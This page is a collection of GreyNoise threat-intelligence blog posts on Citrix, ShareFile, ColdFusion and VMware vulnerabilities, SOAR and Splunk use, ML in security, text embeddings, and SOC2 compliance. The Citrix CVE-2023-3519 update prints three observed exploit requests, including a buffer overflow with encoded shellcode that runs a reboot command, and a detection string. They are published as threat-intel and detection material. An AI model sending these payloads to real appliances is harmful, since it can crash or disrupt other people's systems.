Blog
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Will the real Citrix CVE-2023-3519 please stand up?

(See below for the most recent update: 2023-08-03)

Citrix recently disclosed a single critical remote code execution (RCE) vulnerability, CVE-2023-3519, affecting NetScaler ADC and NetScaler Gateway (now known as Citrix ADC and Citrix Gateway. This vulnerability has a CVSS score of 9.8, making it a high-risk issue. 

GreyNoise has a tag — Citrix ADC/NetScaler CVE-2023-3519 RCE Attempt — that organizations can use to proactively defend against sources of known exploitation.

Over the past several days, numerous organizations have contributed their pieces of the puzzle, both publicly and privately. While the most recent Citrix Security Advisory identifies CVE-2023-3519 as the only vulnerability resulting in unauthenticated remote code execution, there are at least two vulnerabilities that were patched during the most recent version upgrade.

Through the analysis by Rapid 7 and AssetNote a memory corruption vulnerability was discovered in the ns_aaa_saml_parse_authn_request function that handles Security Assertion Markup Language (SAML), which can be reached through HTTP POST requests to “/saml/login”. This vulnerability has been demonstrated to corrupt memory and cause program crashes, but it is unknown whether it can be leveraged for remote code execution at this time.

Through the analysis by Bishop Fox’s Capabilities Development team together with GreyNoise a memory corruption vulnerability was identified in the ns_aaa_gwtest_get_event_and_target_names function. This function can be reached through HTTP GET requests to “/gwtest/formssso”. This vulnerability was demonstrated as capable of being leveraged for stack corruption, leading to remote code execution; and, was further corroborated by AssetNote’s Part 2 Analysis.

Through analysis from Mandiant some indications of compromise (IoCs) and post-exploitation activity are now known. As part of their provided IoCs they shared that an HTTP POST request was used in initial exploitation as well as HTTP payloads containing “pwd;pwd;pwd;pwd;pwd;” which may be useful for writing detection signatures.

2023-08-03 Update

On July 28th GreyNoise began observing activity — https://viz.greynoise.io/tag/citrix-adc-netscaler-cve-2023-3519-rce-attempt?days=30 — for CVE-2023-3519 wherein the attacker was attempting to leverage the vulnerability for memory corruption. An initial analysis of the observed payloads indicates that the attacker initially sends a payload containing 262 `A`'s which would result in a crash of the Citrix Netscaler `nsppe` program. They follow up with two variants using URL Encoded values and appear to be attempting to remotely execute the command `/bin/sh -c reboot` which would result in a full reboot in the system. However, it appears that the attacker may not be aware of the CPU endianness of vulnerable systems. The payloads they are attempting to send would result in memory corruption, but would not result in remote code execution as they expected. This would result in the `nsppe` program crashing.

The observed payloads are provided below for completeness.

GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0

Timeline

How to Leverage GreyNoise in Your SOAR Playbooks

During our latest webinar Proactive Defense Made Easy: Leveraging GreyNoise in Your SOAR Playbooks, we discussed some everyday use cases using GreyNoise with other SOAR platforms. The main goal of using GreyNoise with other SOAR platforms is to quickly identify either opportunistic attacks, get better insight into how infrastructure is being used, as well as enriching alerts using RIOT data to IP's associated with common business services.

Using GreyNoise to identify opportunistic scanning provides context to decisions in a SOAR playbook to either decide to investigate further or more quickly move to block IP's. Adding the checks into an investigation playbook provides data on scan activity and any vulnerabilities observed as being exploited.

A Tines story that uses GreyNoise as the first step to decide additional investigations needed.

RIOT data also provides quick data for an investigation. Many services integrated into an investigation playbook will provide details for when something is malicious but often don't provide details on known or known good services. Everyone wants the confidence to take action with their automation but may not have the insight needed. Additionally, no one wants to be wrong about this decision. RIOT adds this information to a playbook to assist with decision-making.

Phishing email in XSOAR identifying office 365 emails using RIOT data.

GreyNoise can be used in common SOAR use cases to provide better context to phishing playbooks and investigations and have more confidence to block IP's. The power of GreyNoise, alongside other intelligence tools like Recorded Future, VirusTotal, Tines, and Splunk, is nothing short of astonishing(see our full list of integrations). I hope the insights shared during the webinar inspired you to explore these tools further and optimize your cybersecurity investigations. Sign in/up for GreyNoise to explore our data for free.

Watch the full webinar

How to Create Actionable Intelligence with AI and Machine Learning

AI/ML and cybersecurity go together like peanut butter and bananas. You might not think it’s a fit, but it can work out great if you’re into it.

I recently did a talk with Centripetal and wanted to share some highlights as well as the entire video below. This covers a few themes, such as: “how has ML been used in cybersecurity in the past”, “what are the problems with it”, “why we need to use it”, “how to use it responsibly”, and “what to do with all these GPTs”.

If you’re interested in watching it in full, here is the talk.

ML In Security

One of the first use cases for ML in security was spam filtering in early email clients in the late 90s. This was a simple bag of words + a naive Bayes model approach, but has gotten much more complicated over time. 

More recently, ML has been used to build malware detection models. Almost all anti-malware processors in VirusTotal have some ML component.

It has also been used in outlier detection (determining spikes in logs/alerts/traffic) and in rule or workflow generation.

What’s The Problem?

However, it’s not all sunshine, roses, and solved problems. ML has some trust issues, especially when it comes to cybersecurity. Models are never perfect and can create False Negatives and False Positives. 

False Negatives are when we do not detect something as bad when it is indeed bad—it’s a miss. This has obvious problems of allowing something malicious to act on your system/network without your knowledge. 

False Positives are when we call a non-malicious thing bad. This can be just as big of a issue, as it creates unnecessary alerts, leading to alert fatigue, and ultimately leading to ignored alerts which allows actual malicious activity to slip through the cracks.

Cybersecurity has a very low tolerance for both types of errors, and therein lies the issue. ML solutions have to be very, very good at detection without creating too much noise. They also have to provide context for why the ML tool made its determination. 

Why Bother?

It might seem like a pain to use complicated tools like ML/AI, but the brutal truth is that we have to. There is too much data to work through. GreyNoise sees over 2 million unique HTTP requests a day, and that’s just one protocol.

Plus, bad actors aren’t slowing down. Verizon’s DBIR recorded 16k incidents and 5k data breaches last year, and that is merely what is reported. There are ~1,000 Known Exploited Vulnerabilities (CISA) floating around (side note: GreyNoise has tags for almost all of them). 

There is no getting around it, we need to use ML/AI technology to handle the load of information and allow us to become better at defense.

How To Use It

Here I hope to give some practical advice on developing ML/AI tools. It really comes down to two main deliverables: Confidence and Context.

By “Confidence” I don’t mean the ROC score of your model or the confusion matrix results. I mean a score you can produce for every detection/outlier/analysis that you find. For numerous ML applications, a decent analog is given right out of the box. The [0.0, 1.0] score produced from a classification model, the number of standard deviations off the norm, the percent likelihood of an event happening.. These all work well, and you can provide the understanding on how to interpret them. 

Every so often, you have to create your own metric. When we created IP Similarity, we had a similarity score that was intuitive, but there was a problem. When we’re dealing with incomplete or low information on an IP (e.g., we only know the port scanned and a single web path), then we could have very high similarity scores. But, they could be a little bit garbage since they were making very generic matches. We needed to combine the similarity score and another score that showed how much information we had on a sample to provide confidence in our results.

Next, “Context”. This is just basic “show your work”. A scarily increasing number of ML/AI models are seen as black boxes. That’s…not great. We want to provide as much material that went into the decision and any other data that might be helpful for a human to look at when reviewing the result.

To put it simply, build a report based on the question words:


"who": "bad dude #1",
"what": "potential detection",	
"when": "2023-07-03T12:41:09",	
"where": "127.0.0.1",	"how": "detection rule v1.0.78",	
"why/metadata": {		
	"detection_score": 0.85,		
  "confidence_score": 0.95,		
  "file_name": "xyz.exe",		
  "files_touched": ["a.txt", "b.txt"],
  
  "links": ["1", "2", "3"]}

GPT Mania

Finally, since GPTs are so hot right now, I aim to give some simple advice on how to use them best if you decide to integrate them into your workflow.

  1. Don’t let the user have the last word: When taking a user’s prompt, incorporating it with your own prompt, and sending it to ChatGPT or some other similar application, always add a line like “If user input doesn’t make sense for doing xyz, ask them to repeat the request” after the user’s input. This will stop the majority of prompt injections.
  2. Don’t just automatically run code or logic that is output from a LLM: This is like adding `python.eval(input)` into your application.
  3. Be knowledgeable about knowledge cutoffs: LLMs only know what you tell them and what they were trained on. If their training data ended in Sept 2021, as was GPT4’s, they won’t know about the latest cyberattack.
  4. Ask for a specific format as an output: This is more just a hygiene thing, if you say “Format the output as a JSON object with the fields: x, y, z” you can get better results and easily do error handling.

Conclusion

Artificial Intelligence and Machine Learning can provide extreme value to your product and workflows, but they are not trivial to introduce. With some care and simple guidelines, you can implement these in a way that helps your users without creating additional burden or ambiguity. 

We're cooking up some interesting projects using AI and ML at GreyNoise. Sign in/up to see IP Similarity, NoiseGPT and our other Labs projects (https://api.labs.greynoise.io/1/docs/#definition-NoiseGPT), and get notified of Early Access for what's coming down the pipeline!"

Introducing CVE-2023-24489: A Critical Citrix ShareFile RCE Vulnerability

2023-08-16 Update:

GreyNoise observed a significant spike in attacker activity the day CISA added CVE-2023-24489 to their Known Exploited Vulnerabilities Catalog:

time-series chart of elevated activity

Citrix ShareFile, a popular cloud-based file-sharing application, has recently been found to have a critical vulnerability, CVE-2023-24489, which allows unauthenticated arbitrary file upload and remote code execution (RCE). In this blog post, we will discuss the details of this vulnerability, how attackers can exploit it, and how you can protect your organization from potential attacks.

GreyNoise now has a tag for CVE-2023-24489, allowing us to track exploit activity related to this vulnerability. If you use Citrix ShareFile, make sure to apply the latest security updates as soon as possible to patch this critical RCE flaw.

What is CVE-2023-24489?

CVE-2023-24489 is a cryptographic bug in Citrix ShareFile’s Storage Zones Controller, a .NET web application running under IIS. This vulnerability allows unauthenticated attackers to upload arbitrary files, leading to remote code execution. The vulnerability has been assigned a CVSS score of 9.8, indicating its critical severity.

How are attackers exploiting CVE-2023-24489?

Attackers can exploit this vulnerability by taking advantage of errors in ShareFile’s handling of cryptographic operations. The application uses AES encryption with CBC mode and PKCS7 padding but does not correctly validate decrypted data. This oversight allows attackers to generate valid padding and execute their attack, leading to unauthenticated arbitrary file upload and remote code execution.

Researchers at Assetnote dissected the vulnerability and published the first proof-of-concept (PoC) for this CVE. Other PoCs for this have been released on GitHub, increasing the likelihood of attackers leveraging this vulnerability in their attacks and further demonstrating the severity of the issue. 

As of the publishing timestamp of this post, GreyNoise has observed IPs attempting to exploit this vulnerability. Two have never seen GreyNoise before this activity:

chart of active exploitation activity

Protecting your organization from CVE-2023-24489

Citrix has released a security update addressing the ShareFile vulnerability. Users are advised to apply the update to protect their systems from potential attacks. The fixed version of the customer-managed ShareFile storage zones controller is ShareFile storage zones controller 5.11.24 and later versions. The latest version of ShareFile storage zones controller is available from the following location: https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-511.html.

External Resources

Enhancing Security with GreyNoise

Leverage GreyNoise’s hourly updated data on scanning and exploit activities to stay ahead of opportunistic attackers. Our threat intelligence platform allows you to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems against vulnerabilities like CVE-2023-24489.

Three New Tags For ColdFusion (2 🏷️) and Citrix (1 🏷️)

GreyNoise detection engineers have released tags for 

Citrix ADC/NetScaler CVE-2023-3519 Remote Code Execution (RCE) Attempts


Adobe ColdFusion CVE-2023-29298 Access Control Bypass Attempts

Adobe ColdFusion CVE-2023-29300 Remote Code Execution (RCE) Attempts

Adobe ColdFusion Vulnerabilities

CVE-2023-29298 is an Improper Access Control vulnerability affecting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in a security feature bypass, allowing an attacker to access the administration CFM and CFC endpoints without user interaction. The vulnerability has a CVSS 3.x base score of 7.5, indicating high severity.

CVE-2023-29300 is a Deserialization of Untrusted Data vulnerability impacting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in arbitrary code execution without user interaction. The vulnerability has a CVSS 3.x base score of 9.8, indicating critical severity.

Citrix ADC/NetScaler Vulnerability

CVE-2023-3519 is an unauthenticated remote code execution (RCE) vulnerability impacting several versions of Citrix ADC and Citrix Gateway. This vulnerability allows a malicious actor to execute arbitrary code on affected appliances. It may also serve as an initial access vector for ransomware and other types of malicious campaigns. GreyNoise would like to thank the Capability Development team at Bishop Fox for collaborating with us to track this emerging threat. They have an excellent, detailed write-up for folks interested in more details.

CISA's Known Exploited Vulnerabilities Catalog

All three vulnerabilities are listed in CISA's Known Exploited Vulnerabilities Catalog, meaning they have been observed being exploited in the wild and pose significant risks to organizations. Organizations should prioritize remediation efforts for these vulnerabilities to reduce the likelihood of compromise by known threat actors.

External Resources

Enhance Security with GreyNoise's Threat Intelligence Data

Organizations are strongly encouraged to use GreyNoise’s hourly updated threat intelligence data to block IP addresses that are seen exploiting these vulnerabilities. By leveraging GreyNoise's tags and alerts, organizations can enhance their security posture and protect their systems from potential exploitation attempts while allowing their operations teams time to apply patches or mitigations.

Cutting Through the Noise: How GreyNoise Helps Security Analysts

In today's world, where networks generate an overwhelming amount of data, security analysts often find themselves struggling to separate the real threats from the noise. Their days are spent in a constant reactive mode, leaving little room for proactive measures due to limited time and resources. In this blog post, we'll delve into how GreyNoise empowers security analysts and transforms their daily work by cutting through the noise and providing invaluable insights.

So, what exactly is GreyNoise?

GreyNoise is a powerful threat intelligence platform designed to assist security analysts in identifying noise and minimizing false positives. By meticulously collecting and analyzing internet-wide scan and attack data, GreyNoise equips security teams with contextual information about the threats they encounter. With its ability to filter out noise and shed light on the sources of attacks, GreyNoise empowers security analysts to focus their efforts on genuine threats.

How we can help

1. Maximizing SOC Efficiency: Banishing False Positives

Security Operation Centers (SOCs) are often inundated with an overwhelming barrage of security alerts. However, it's disheartening to discover that a significant portion of these alerts, often exceeding 50%, are nothing more than false positives or irrelevant internet noise. One exasperated GreyNoise customer even lamented, "Stop chasing ghosts!" (this is why you will see our little “ghostie” icon many places on our website and in our product) GreyNoise comes to the rescue by enabling SOC teams to filter out known benign and noisy alerts originating from SIEM and SOAR systems. This empowers analysts to laser-focus on targeted and malicious activities that truly demand attention. Learn More >>

2. Enhancing Threat Intelligence: The Power of Context

GreyNoise takes threat intelligence to new heights by providing security analysts with valuable context surrounding the sources of attacks. Through thorough analysis of internet-wide scan and attack data, GreyNoise identifies patterns and offers insights into the tactics, techniques, and procedures (TTPs) employed by attackers. Armed with this knowledge, security analysts gain a deeper understanding of the threats they face, enabling them to devise more effective strategies to mitigate risks and safeguard their organizations. Learn More >>

3. Defending Against Mass exploitation Attacks: Staying One Step Ahead

GreyNoise provides an early warning system for vulnerabilities being actively exploited in the wild, plus dynamic IP blocklists that security teams can use during their window of exposure. Now you can swiftly identify trending internet attacks focused on specific vulnerabilities and CVEs, efficiently triage alerts based on malicious, benign, or targeted IP classifications, and take proactive measures to block and hunt down IP addresses opportunistically exploiting a particular vulnerability. By leveraging these comprehensive features, security teams gain an edge in staying ahead of threats and bolstering their defenses against mass exploitation attacks. Learn More >>

Conclusion

Security analysts grapple with numerous challenges in their day-to-day work, including the overwhelming volume of network data and the complexity of evolving threats. However, GreyNoise emerges as a formidable ally, providing context about attack sources, reducing false positives, and bolstering incident response capabilities. By harnessing the power of GreyNoise, security analysts can direct their attention to genuine threats and ensure their organizations remain resilient against cyber threats.

Take the first step and explore our data for free to experience the transformative power of GreyNoise firsthand. 

Text Embedding for Fun and Profit

Words != Numbers

Computers don’t understand words. They don’t understand verbs, nouns, prepositions, or even adjectives. They kinda understand conjunctions (and/or/not), but not really. Computers understand numbers.

To make computers do things with words, you have to make them numbers. Welcome to the wild world of text embedding!

In this blog I want to teach you about text embedding, why it’s useful, and a couple ways to do it yourself to make your pet project just a little bit better or get a new idea off the ground. I’ll also describe how we’re using it at GreyNoise.

Use Cases

With LLMs in the mix, modern use cases of text embedding are all over the place.

  • Can’t fit all your text into a context window? Try embedding and searching the relevant parts.
  • Working on sentiment analysis? Try to build a classifier on embedded text
  • Looking to find similar texts? Create a search index on embedded values
  • Want to build a recommendation system? Figure out how things are similar without building a classification model

In all of these, we’re encoding a piece of text into a numerical vector in order to do basic machine learning tasks against it, such as nearest neighbors or classification. If you’ve been paying attention in class, this is just feature engineering, but it’s unsupervised and on unstructured data, which has previously been a really hard problem.

How to method 1: Cheat mode

Lots of large models will offer sentence level embedding APIs. One of the most popular ones is OpenAI https://platform.openai.com/docs/guides/embeddings. It doesn’t cost a ton, probably under $100 for most data sets, but you’re dependent on the latency of external API calls and the whims of another company. Plus, since it’s a GPT model it is based on the encoding of the last word in your text (with the cumulative words before it), that doesn’t feel as cohesive as what I’m going to suggest next. (This is foreshadowing a BERT vs GPT discussion)

How to method 2: Build your own

Side quest: GPT vs BERT

GPT stands for Generative Pre-trained Transformer. It is built to predict the next word in a sequence, and then the next word, and then the next word. Alternately, BERT stands for Bidirectional Encoder Representations from Transformers. It is built to predict any word within a set piece of text. 

The little bit of difference between them, because they both use Transformers, is where they mask data while training. During the training process a piece of the text is masked, or obscured, from the model and the model is asked to predict it. When the model gets it right, hooray! When the model gets it wrong, booo! These actions either reinforce or change the weights of the neural network to hopefully better predict in the future. 

GPT models only mask the last word in a sequence. They are trying to learn and predict that word. This makes them generative. If your sequence is “The cat jumped” it might predict “over”. Then your sequence would be “The cat jumped over” and it might predict “the”, then “dog”, etc. 

BERT models mask random words in the sequence, so they are taking the entire sequence and trying to figure out the word based on what came before and after (bidirectional!!!). For this point, I believe they are better for text embedding. Note, the biggest GPT models are orders of magnitude bigger than the biggest BERT models because there is more money in generation than encoding/translation, so it is possible GPT4 does a better job at generic sentence encoding than a home grown BERT, but let's all collectively stick it to the man and build our own, it’s easy.

Figure 1: BERT based masking
Figure 2: GPT based masking

Main quest: Building a text encoder

If your data is perhaps not just basic English text data, building your own encoder and model might be the right decision. For GreyNoise, we have a ton of HTTP payloads that don’t exactly follow typical English language syntax. For this point, we decided to build our own payload model and wanted to share the knowledge.

There are two parts of a LLM. The same parts you’ll see in HuggingFace models (https://huggingface.co/models) and everywhere else. A Tokenizer and a Model. 

Tokenizer

The tokenizer takes your input text and translates it to a base numerical representation. You can train a tokenizer to learn vocabulary directly from your dataset or use the one attached to a pre-trained model. If you are training a model from scratch you might as well train a tokenizer (it takes minutes), but if you are using a pre-trained model you should stick with the one attached. 

Tokens are approximately words, but if a word is over 4-5 characters it might get broken up. “Fire” and “fly” could each be one token, but “firefly” would be broken into 2 tokens. This is why you might often hear that tokens are “about ¾ of a word”, it’s an average of word to token. Once you have a tokenizer it can translate a text into integers representing the index of the tokenizer set.

“The cat jumped over” -> 456, 234, 452, 8003

Later, supposing we have a model, if you have the output 8003, 456, 234, 452 (I reordered on purpose) you could translate that back to “over the cat jumped”

The tokenizer is the translation of a numeric representation to a word (or partial word) representation. 

Model

With a tokenizer, we can pass numerical data to a model and get numerical data out, and then re-encode that to text data.

We could discuss the models, but others have done that before (https://huggingface.co/blog/bert-101) All of these LLM models are beasts. They have basic (kinda) components, but they have a lot of them, which makes for hundreds of millions to billions of parameters. For 98% of people, you want to know what it does, the pitfalls, and how to use it without knowing the inner workings of how transformer layers are connected to embedding, softmax, and other layers. We’re going to leave that to another discussion. We’ll focus on what it takes to train and get a usable output.

The models can be initialized with basic configs and trained with easy prompts. Thanks to the folks at Huggingface (you the real MVP!). For this we are going to use a RoBERTa model (https://huggingface.co/docs/transformers/model_doc/roberta). You could use a pre-trained model and fine-tune it, however, we’re just going to use the config and build the whole model from random/scratch. A very similar workflow is usable if you want to use a pre-trained model and tokenizer though. I promise I won’t judge.

Code

Import or copy the code from model training gist

Create your own list of text you want to train the encoder and model on. It should be at least 100k samples.

If you have created your data set as `str_data` and set a model path as a folder where you want to save the model and tokenizer, you can just do:

tokenizer = create_tokenizer(model_path, str_data[0:50000]) ## you don’t really need more than 50k to train the tokenizer
model = create_model_from_scratch(model_path, tokenizer)

This will create the tokenizer and model. The tokenizer is usable at this state. The model is just random untrained garbage though.

When you’re ready for the first train, get into the habit of loading the tokenizer and model you created and training it, this is what people call “checkpoints”.

tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
model = RobertaForMaskedLM.from_pretrained(model_path)
model = train_model(tokenizer, model, model_path, str_data[0:100000]) ## train on however much you want at a time, there is a whole other discussion about this, but give it at least 100k samples.

When you want to retrain or further train, which at this point is also called fine-tuning, just load it up and go again with new or the same data. Nobody is your boss and nobody really knows what is best right here.

Note: You’re going to want to use GPUs for training. Google Colab and Huggingface Notebooks have some free options. All in, this particular model will require 9-10GB of GPU memory, easily attainable by commodity hardware.

Evaluating

Large Language Models do not have a great list of sanity checks. Ironically most benchmarks are against other LLMs. For embeddings we can do a little better to work toward your personal model. When you take two samples that you think are similar and run them through the model to get the embeddings, you can calculate how far they are apart with either cosine or Euclidean distance. This gives you a sanity check of if your model is performing as expected or just off the rails.

For Euclidean distance use:

import numpy as np

euclidean_dist = np.linalg.norm(embedding1 - embedding2)

For cosine distance use:

from sklearn.metrics.pairwise import cosine_similarity

cos_sim = cosine_similarity(embedding1.reshape(1, -1), embedding2.reshape(1, -1))

How We’re Using it at GreyNoise

We’re early adopters of LLM tech at GreyNoise, but it is hard to put it in the hands of users responsibly. We basically don’t want to F up. We have an upcoming feature called NoiseGPT that takes natural language text and turns it into GNQL queries. Begone the days of learning a new syntax for just figuring out what the hell is going on. 

We also have an in-development feature called Sift, a way to tease out the new traffic on the internet and describe it for users. This would take the hundreds of thousands of http payloads we see every day and reduce it to the ~15 new and relevant ones and also describe what they are doing. EAP coming on that soon. 

Plus, if you think of any great ideas we should be doing, please hit us up. We have a community slack and my email is below. We want to hear from you. 

Fin

With these tips I hope you’re able to create your own LLM for your projects or at least appreciate those that do. If you have any questions please feel free to reach out to daniel@greynoise.io, give GreyNoise a try (https://viz.greynoise.io/), and look out for features using these techniques in the very near future.

Observed In The Wild: New Tag For CVE-2023-20887 — VMWare Aria Operations for Networks

On June 7, 2023 VMWare released an advisory for CVE-2023-20887, a command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Cloud Mangememt) with a critical severity score (CVSS) of 9.8. The proof of concept for this exploit was released June 13th, 2023 by SinSinology. 

Primary takeaway is:

“VMWare Aria Operations Networks is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user.” – SinSinology


This issue can be resolved by updating to the latest version. Further information can be found here: https://www.vmware.com/security/advisories/VMSA-2023-0012.html

At the time of writing we have observed attempted mass-scanning activity utilizing the Proof-Of-Concept code mentioned above in an attempt to launch a reverse shell which connects back to an attacker controlled server in order to receive further commands. Continual monitoring of activity related to this vulnerability can be tracked via the relevant GreyNoise tag below.

Example HTTP POST request containing code to exploit the described vulnerability

Splunk and GreyNoise Integration: Discovering Hidden Insights through Feeds and Dashboards

If you’ve ever seen a GreyNoise presentation by me, it’s more than likely at some point I will pull up my Splunk instance to show what I would consider to be a few clever dashboards and searches. Apart from the impromptu searches that I may write (which may not be great), there’s some powerful and practical ways you can leverage GreyNoise data inside your Splunk environment right now.

Feeds

With the latest version of the GreyNoise app for Splunk (v.2.2.0), you can now keep the last 24 hours of data local to your Splunk instance with feeds. Plus, it’s easier than ever to filter out noise from large datasets. Instead of relying on API lookups, the data can be referenced locally first to remove opportunistic and benign IP’s quickly when hunting through your data.

Filtering web logs by IP’s not observed by GreyNoise: index=main sourcetype=access_combined | lookup greynoise_indicators.csv ip as clientip| search NOT classification=benign

Dashboards

A good dashboard can turn a bad day into a great one.

I always joke that data isn’t real until it’s displayed on a map, but there's some truth to it! Having a quick overview of your data visually makes it easier to piece together an understanding of the scan activity landscape.

Using custom commands you can pull out information on internet traffic to safely and confidently ignore (things we classify as ‘benign’ or IP’s from the RIOT dataset) and particular pieces of information you may want to investigate further. Everything left over will include the IP’s that are not in GreyNoise, which could indicate more targeted attacks, and IP’s we classify as ‘unknown’.

You can find more information about our classifications and how to apply GreyNoise data to your analysis in our documentation: https://docs.greynoise.io/docs/applying-greynoise-data-to-your-analysis

Paired with information from your firewall imported into Splunk, GreyNoise data leveraged in a dashboard can show vulnerabilities that ‘unknown’ IP’s are specifically looking for. Combining this knowledge with your current vulnerability scans can help you quickly identify if someone is interested in vulnerabilities specific to your attack surface.

Using GreyNoise with firewall data to build a dashboard to find potentially targeted activity as well as provide details for how IP addresses are operating.

Known Good

We talk a lot about filtering out opportunistic traffic, and enriching data based on GreyNoise but let’s not sleep on the RIOT dataset. If you’re not familiar with RIOT it’s a collection of ~50 million IP addresses that are associated with common business services.

What does this let you do with your data in Splunk? There’s a lot of ways that people are applying this dataset in their searches and hunting. Ryan Kovar wrote a great blog post about using wiredata with Splunk (https://www.splunk.com/en_us/blog/security/wire-data-huh-what-is-it-good-for-absolutely-everything-say-it-again-now.html) and while legitimate services can be abused (Hello T1567!) they can also make up a significant portion of the traffic being searched. RIOT makes it easy to do a first pass and remove any outbound traffic to those services and makes it easier to find potentially interesting traffic.

Using RIOT to summarize outbound network activity using Squid proxy data: index=main source=squid:access | gnriot ip_field=src | rename greynoise_name as organization | stats count by organization

More on our RIOT dataset here: https://docs.greynoise.io/docs/riot-data

Learn More About GreyNoise + Splunk

If you find this information useful then join me on June 15th for a live webinar where I’ll cover the Splunk integration in detail. Also, if you are going to .conf 23 we will be there as well! Swing by booth 103 or set up a meeting with us here.  

SOC2 For Startups

GreyNoise today announced that it achieved SOC 2 Type 2 compliance in accordance with American Institute of Certified Public Accountants (AICPA) standards for Systems and Organizational Controls (SOC). Achieving SOC 2 compliance with unqualified opinion serves as third-party industry validation that companies provide best-in-class enterprise-level security for their customers’ data. 

SOC2 is a difficult undertaking, especially if you do not have dedicated compliance or security resources who will contribute to creating the policies and implementing the changes. If you take one thing away from this post, let it be this: hire for Systems Administrator and IT operations roles before you think you need them because it will be too late by the time you do need them. Systems Administration tech debt and work is an exponential curve; the longer you go without them, the harder it becomes to fix. Aside from the struggle of collecting evidence through screenshots and questionnaires, both systems administration and engineering cycles will be required to meet the framework standards and controls. 

Foundation

SOC2 is broken out into five pillars: 

  1. Security of a service organization's system.
  2. Availability of a service organization's system.
  3. Confidentiality of customer information.
  4. Processing integrity of a service organization's system.
  5. Privacy of customer personal information.

Approaching the controls one-by-one can be a daunting task. We found it was more manageable to divide the process into general phases, the last of which is the audit itself.

Phase 1 - Pick the platforms

Our advice here is to not go it alone. From evidence collection and auditor documentation delivery to infrastructure and compliance control scanning, there are myriad different vendors which make every step of the process easier. Take time choosing the auditor that is right for you. Some are very “by the book” and others will be more lenient on “acceptable risk” controls. 

You will need platforms for a lot of controls - including SAST, vulnerability scanning, asset tracking/management, version control, and more. For the most part, free open-source software exists for each step along the way. We found it best to mix and match, opting for paid platforms where open-source implementation was going to take too much engineering time value away from other ongoing projects. For example, gosec and tfsec for some language-specific SAST scanning, CloudFlare’s Flan for internal vulnerability scanning, and Grokability Snipe-IT for asset management versus GitHub Advanced Security licenses, Tenable Nessus, ServiceNow ServiceDesk, or Oomnitza. These latter are perfectly useful products, but it’s important to decide what you want to pay for versus what you can run yourself for free. The value any company puts on each function or service the platform provides compared to the cost or time value of money will be different. 

The two direct SOC2-specific platform choices are the auditor and the compliance automation platform. SOC2 is significantly more difficult without a compliance automation platform - we estimate using such a platform saves over a hundred hours of work.

Auditors: Check which audit firm was used when you collect your SOC2 and SOC3 reports from your vendors. Turn that list into your potential auditor review list, and make a decision for an audit firm based on your meetings and due diligence with those firms. GreyNoise went with Prescient Assurance. They have a security arm that can provide your third-party penetration test, which is optional for SOC2, for a bundle discount.

Compliance Automation: Auditors will need access to a mountain of evidence in the form of read-only access to your environment, screenshots, and questionnaire answers. This is made easier with a compliance automation platform. Whereas an audit firm may not have a process in place for provisioning roles for their access, compliance platforms do, and they make it easy to both roll out and roll back. GreyNoise decided to use SecureFrame as their pricing, offering, and overall functionality/featuring was more directly suited to our needs. Some other popular options include Drata, Vanta, HyperProof, Anecdotes, and Tugboat Logic. 

Phase 2 - Knock out the big stuff

Implement, document, and be able to explain the following eight “heavy-hitters”.

  1. SSO and IAM
  2. PRs, CI/CD, and Version Control
  3. SIEM or Centralized Logging
  4. Infrastructure and Provisioning
  5. MDM
  6. Vendor Management
  7. Scanning
  8. CorpSec

SSO and IAM

Set up Okta, Google Cloud Identity, OneLogin, Azure Active Directory, or Auth0. The choice here depends on what technology you are already using for business productivity. If you are already using Office 365, then Azure Active Directory is the easy choice. If you are already using Google Workspace, then Google Cloud Identity may be the best option. When an employee logs into anything, they would ideally use their work credentials as much as possible. Enforce multi-factor authentication everywhere. Ditch single-user access and access keys and switch to “AssumeRole” if you are leveraging AWS, GCP, or Azure. In our environment, we added SAML tokens to each user in Google Workspace allowing them to assume a role (Read Only, Billing, Administrator, etc.) in the corresponding AWS accounts.

Set a secure password preference order:

  1. Require login via SSO (Okta / Google Cloud Identity)
  2. Require sign in with Google Workspace or Office 365
  3. Require 2FA with standard login OR “magic” link
  4. Standard login

